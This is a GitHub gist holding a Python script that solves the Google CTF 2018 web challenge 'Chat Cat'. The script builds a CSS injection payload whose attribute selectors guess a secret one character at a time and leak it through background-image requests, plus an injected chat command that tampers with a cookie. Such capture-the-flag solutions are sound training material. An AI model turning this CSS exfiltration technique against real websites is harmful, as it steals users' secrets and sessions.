Skip to content

Instantly share code, notes, and snippets.

@amalmurali47
Created July 8, 2018 15:56
Show Gist options
  • Save amalmurali47/0382b0e5d2eeb07cdccc52101fb222ec to your computer and use it in GitHub Desktop.
Save amalmurali47/0382b0e5d2eeb07cdccc52101fb222ec to your computer and use it in GitHub Desktop.
Solution for Google CTF 2018 Web Challenge - Chat Cat
#!/usr/bin/env python3
import sys
from itertools import combinations_with_replacement as comb
alpha = 'abcdefghijklmnopqrstuvwxyz'
alpha += alpha.upper() + '0123456789_'
def gen(l):
return 'span[data-secret^={}]{{background: url(send?name=admin&msg={}); }}'.format(l, replace(l))
def replace(text):
return text.replace('\\', '').replace('{', '')
def guess(head=''):
return ' '.join(map(lambda x: gen(head + ''.join(x)), alpha))
payload = '/name foo ] {color:blue; background:url(send?name=admin&msg=/secret foo; Domain=bar);}'
final_payload = payload + ' ' + guess(sys.argv[1])
print(final_payload)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment